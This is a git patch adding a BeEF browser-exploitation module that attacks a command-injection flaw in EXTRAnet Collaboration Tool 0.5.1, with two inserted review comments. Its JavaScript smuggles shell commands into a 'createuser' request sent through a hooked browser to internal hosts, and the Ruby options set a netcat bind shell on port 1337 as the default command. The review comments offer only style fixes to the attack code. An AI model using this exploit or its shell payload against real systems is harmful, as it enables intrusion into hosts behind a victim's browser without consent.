From 0dfab0e3480a7e0b514a2b35cf9c623b8bdafd74 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Fri, 24 May 2013 16:40:02 +0930
Subject: [PATCH] Add EXTRAnet Collaboration Tool Command Execution exploit module
---
 modules/exploits/extract_cmd_exec/command.js | 43 +++++++++++++++++++
 modules/exploits/extract_cmd_exec/config.yaml | 16 +++++++
 modules/exploits/extract_cmd_exec/module.rb | 30 +++++++++++++
 3 files changed, 89 insertions(+)
 create mode 100644 modules/exploits/extract_cmd_exec/command.js
 create mode 100644 modules/exploits/extract_cmd_exec/config.yaml
 create mode 100644 modules/exploits/extract_cmd_exec/module.rb
diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(extract_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
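Review bot: In the clean-up section at the end of the hunk, `cleanup` is assigned without `var`, so it is created as a global on the hooked page's `window`, and `setTimeout("cleanup()", timeout*1000)` passes a string to be evaluated rather than a function reference; as a matter of style both read better as a local function passed directly, `var cleanup = function() {` ... `setTimeout(cleanup, timeout*1000);`. The `timeout` value is read from the template near the top but its meaning only becomes clear from that final `setTimeout` line, so a comment such as `// timeout: seconds to wait before the iframe is removed from the page` next to its declaration would document the option.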
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ extract_cmd_exec:
+ enable: true
+ category: "Exploits"
+ name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+ description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
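Review bot: `post_execute` in the module.rb hunk uses `if not @datastore['result'].nil?`, which Ruby style guides flag in favour of the modifier form `save({'result' => @datastore['result']}) unless @datastore['result'].nil?` (and the same for the `fail` line). The `return` in `self.options` is likewise redundant, since the array literal is already the method's last expression. A one-line comment above `post_execute` saying that it persists whichever of `result` or `fail` the browser-side command.js reported through `beef.net.send` would help a reader connect the two files; the hash spacing in the `options` entries (`'name'=>` versus `'ui_label' =>`) could also be made consistent.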